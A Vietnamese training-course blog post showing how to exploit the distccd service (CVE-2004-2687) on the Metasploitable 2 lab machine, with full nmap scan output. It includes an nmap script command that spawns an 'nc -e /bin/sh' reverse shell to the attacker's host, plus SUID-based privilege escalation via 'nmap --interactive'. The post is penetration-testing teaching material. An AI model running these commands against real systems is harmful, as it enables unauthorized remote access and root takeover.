[CEH v11 – OSCP v2] Target Metasploitable 2 {Một Bài Viết Dài – Bài Tập Tổng Quát} p2 : Pentest distccd port 3632

Các bạn hãy xem kết quả của quá trình dò quét với nmap , ta đã đánh giá port 21 và bây giờ chuyển qua port 3632 của dịch vụ distccd . Các bạn có thể chọn port từ thấp đến cao hay theo thứ tự nào mà minh thích, cứ cái nào dễ làm trước , khó làm sau hay ngược lại tùy sở thích.

Xem p1 [CEH v11 – OSCP v2] Target Metasploitable 2 – Hacking qua Port 21 của VSFTPD

Xem bài làm của học viên các lớp trước khai thác lỗi này và leo thang qua UDEV

Tham khảo chơi theo cách dễ tại đây , tuy nhiên đến với CEH VIETNAM các bạn nên chơi khó hơn. Hãy tìm cách khác để thâm nhập và leo thang theo cách dễ hiểu hơn, khoa hơn cách làm “mò” như trong bài của Web CSS

Hãy chờ video và bài hướng dẫn trong tối nay, các bạn học viên hãy làm bài tập …

Sau đây là bài minh họa cách khai thác distcc v1 sử dụng nmap nse với cú pháp

#nmap -p 3632 –script distcc-cve2004-2687 –script-args=”distcc-cve2004-2687.cmd=’nc -e /bin/sh 192.168.75.136 5555′” 192.168.75.131 -Pn

Các bạn nhớ hứng với nc -nlvp 5555

Bài Hướng Dẫn

Như vậy ta đã có shell nhưng shell này còn dỏm, các bạn phải nâng shell như bài hướng dẫn tại đây và video bài học sau đây …. (nâng cấp lên TTY Shell qua python)

Bây giờ, với TTY Shell các bạn có thể tìm các phương án để leo thang đạc quyền lấy root.

1 — tim lỗi của kernel ví dụ ở đây các bạn chạy uname -a và tìm kiếm sẽ thấy nhân có lỗi UDEV mà trong bài minh họa của học viên có trình bày. Hoặc tham khảo trên NULL BTE

2 — tìm các tiến trình có set SUID bit, với các lệnh như sau

find / -user root -perm -4000 -print 2>/dev/null
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} \;

các bạn thấy có /user/bin/nmap (có thể có những tiến trình hay dịch vụ khác, xem chi tiết 2 bài viết của pentest blog và hackingarticle mà CEH VIETNAM có tổng hợp sẵn trong Cyber Kill Chain cho dễ tìm là : leo-thang-dac-quyen-qua-suid-executables : https://cehvietnam.com/2021/03/04/leo-thang-dac-quyen-qua-suid-executables/

Bây giờ, ta có thể chạy lệnh

nmap –interactive

rồi

nmap> !sh

sh-3.2# whoami

root

chi tiết qua bài trình bày sau đây ……….

root@kali:~# nmap -p- 192.168.75.131 -sC -sV -O -v 
Starting Nmap 7.70 ( https://nmap.org ) at 2021-03-04 03:18 EST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:18
Completed NSE at 03:18, 0.00s elapsed
Initiating NSE at 03:18
Completed NSE at 03:18, 0.00s elapsed
Initiating ARP Ping Scan at 03:18
Scanning 192.168.75.131 [1 port]
Completed ARP Ping Scan at 03:18, 0.03s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:18
Completed Parallel DNS resolution of 1 host. at 03:18, 0.07s elapsed
Initiating SYN Stealth Scan at 03:18
Scanning 192.168.75.131 [65535 ports]
Discovered open port 111/tcp on 192.168.75.131
Discovered open port 3306/tcp on 192.168.75.131
Discovered open port 139/tcp on 192.168.75.131
Discovered open port 53/tcp on 192.168.75.131
Discovered open port 5900/tcp on 192.168.75.131
Discovered open port 21/tcp on 192.168.75.131
Discovered open port 25/tcp on 192.168.75.131
Discovered open port 445/tcp on 192.168.75.131
Discovered open port 22/tcp on 192.168.75.131
Discovered open port 80/tcp on 192.168.75.131
Discovered open port 23/tcp on 192.168.75.131
Discovered open port 1524/tcp on 192.168.75.131
Discovered open port 1099/tcp on 192.168.75.131
Discovered open port 43592/tcp on 192.168.75.131
Discovered open port 8787/tcp on 192.168.75.131
Discovered open port 514/tcp on 192.168.75.131
Discovered open port 512/tcp on 192.168.75.131
Discovered open port 60974/tcp on 192.168.75.131
Discovered open port 5432/tcp on 192.168.75.131
Discovered open port 3632/tcp on 192.168.75.131
Discovered open port 513/tcp on 192.168.75.131
Discovered open port 37522/tcp on 192.168.75.131
Discovered open port 6000/tcp on 192.168.75.131
Discovered open port 2121/tcp on 192.168.75.131
Discovered open port 8180/tcp on 192.168.75.131
Discovered open port 6667/tcp on 192.168.75.131
Discovered open port 44044/tcp on 192.168.75.131
Discovered open port 6697/tcp on 192.168.75.131
Discovered open port 2049/tcp on 192.168.75.131
Discovered open port 8009/tcp on 192.168.75.131
Completed SYN Stealth Scan at 03:18, 6.91s elapsed (65535 total ports)
Initiating Service scan at 03:18
Scanning 30 services on 192.168.75.131
Completed Service scan at 03:20, 121.19s elapsed (30 services on 1 host)
Initiating OS detection (try #1) against 192.168.75.131
NSE: Script scanning 192.168.75.131.
Initiating NSE at 03:20
NSE: [ftp-bounce] PORT response: 500 Illegal PORT command.
Completed NSE at 03:22, 74.68s elapsed
Initiating NSE at 03:22
Completed NSE at 03:22, 0.02s elapsed
Nmap scan report for 192.168.75.131
Host is up (0.00060s latency).
Not shown: 65505 closed ports
PORT      STATE SERVICE     VERSION
21/tcp    open  ftp         vsftpd 2.3.4
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 192.168.75.135
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      vsFTPd 2.3.4 - secure, fast, stable
|_End of status
22/tcp    open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
| ssh-hostkey: 
|   1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
|_  2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
23/tcp    open  telnet      Linux telnetd
25/tcp    open  smtp        Postfix smtpd
|_smtp-commands: metasploitable.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
|_ssl-date: 2021-03-03T03:36:28+00:00; -1d04h44m29s from scanner time.
| sslv2: 
|   SSLv2 supported
|   ciphers: 
|     SSL2_DES_192_EDE3_CBC_WITH_MD5
|     SSL2_RC4_128_WITH_MD5
|     SSL2_RC2_128_CBC_WITH_MD5
|     SSL2_DES_64_CBC_WITH_MD5
|     SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
|_    SSL2_RC4_128_EXPORT40_WITH_MD5
53/tcp    open  domain      ISC BIND 9.4.2
| dns-nsid: 
|_  bind.version: 9.4.2
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2
|_http-title: Metasploitable2 - Linux
111/tcp   open  rpcbind     2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      44044/tcp  mountd
|   100005  1,2,3      44132/udp  mountd
|   100021  1,3,4      55388/udp  nlockmgr
|   100021  1,3,4      60974/tcp  nlockmgr
|   100024  1          43592/tcp  status
|_  100024  1          46182/udp  status
139/tcp   open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp   open  netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
512/tcp   open  exec        netkit-rsh rexecd
513/tcp   open  login?
514/tcp   open  tcpwrapped
1099/tcp  open  java-rmi    Java RMI Registry
1524/tcp  open  bindshell   Metasploitable root shell
2049/tcp  open  nfs         2-4 (RPC #100003)
2121/tcp  open  ftp         ProFTPD 1.3.1
3306/tcp  open  mysql       MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 10
|   Capabilities flags: 43564
|   Some Capabilities: Support41Auth, Speaks41ProtocolNew, SwitchToSSLAfterHandshake, ConnectWithDatabase, SupportsCompression, LongColumnFlag, SupportsTransactions
|   Status: Autocommit
|_  Salt: xoHVX8KTB0g9'TQ{:MT=
3632/tcp  open  distccd     distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
5432/tcp  open  postgresql  PostgreSQL DB 8.3.0 - 8.3.7
|_ssl-date: 2021-03-03T03:36:27+00:00; -1d04h44m30s from scanner time.
5900/tcp  open  vnc         VNC (protocol 3.3)
| vnc-info: 
|   Protocol version: 3.3
|   Security types: 
|_    VNC Authentication (2)
6000/tcp  open  X11         (access denied)
6667/tcp  open  irc         UnrealIRCd
6697/tcp  open  irc         UnrealIRCd
8009/tcp  open  ajp13       Apache Jserv (Protocol v1.3)
|_ajp-methods: Failed to get a valid response for the OPTION request
8180/tcp  open  http        Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/5.5
8787/tcp  open  drb         Ruby DRb RMI (Ruby 1.8; path /usr/lib/ruby/1.8/drb)
37522/tcp open  java-rmi    Java RMI Registry
43592/tcp open  status      1 (RPC #100024)
44044/tcp open  mountd      1-3 (RPC #100005)
60974/tcp open  nlockmgr    1-4 (RPC #100021)
MAC Address: 00:0C:29:2D:54:D7 (VMware)
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Uptime guess: 0.779 days (since Wed Mar  3 08:39:47 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=201 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts:  metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: -1d03h04m29s, deviation: 2h53m13s, median: -1d04h44m29s
| nbstat: NetBIOS name: METASPLOITABLE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
|   METASPLOITABLE<00>   Flags: <unique><active>
|   METASPLOITABLE<03>   Flags: <unique><active>
|   METASPLOITABLE<20>   Flags: <unique><active>
|   \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
|   WORKGROUP<00>        Flags: <group><active>
|   WORKGROUP<1d>        Flags: <unique><active>
|_  WORKGROUP<1e>        Flags: <group><active>
| smb-os-discovery: 
|   OS: Unix (Samba 3.0.20-Debian)
|   NetBIOS computer name: 
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-03-02T22:36:26-05:00
|_smb2-time: Protocol negotiation failed (SMB2)

NSE: Script Post-scanning.
Initiating NSE at 03:22
Completed NSE at 03:22, 0.00s elapsed
Initiating NSE at 03:22
Completed NSE at 03:22, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 205.03 seconds
           Raw packets sent: 65573 (2.886MB) | Rcvd: 65551 (2.623MB)

1 bình luận về “[CEH v11 – OSCP v2] Target Metasploitable 2 {Một Bài Viết Dài – Bài Tập Tổng Quát} p2 : Pentest distccd port 3632

Trả lời

Please log in using one of these methods to post your comment:

WordPress.com Logo

Bạn đang bình luận bằng tài khoản WordPress.com Đăng xuất /  Thay đổi )

Google photo

Bạn đang bình luận bằng tài khoản Google Đăng xuất /  Thay đổi )

Twitter picture

Bạn đang bình luận bằng tài khoản Twitter Đăng xuất /  Thay đổi )

Facebook photo

Bạn đang bình luận bằng tài khoản Facebook Đăng xuất /  Thay đổi )

Connecting to %s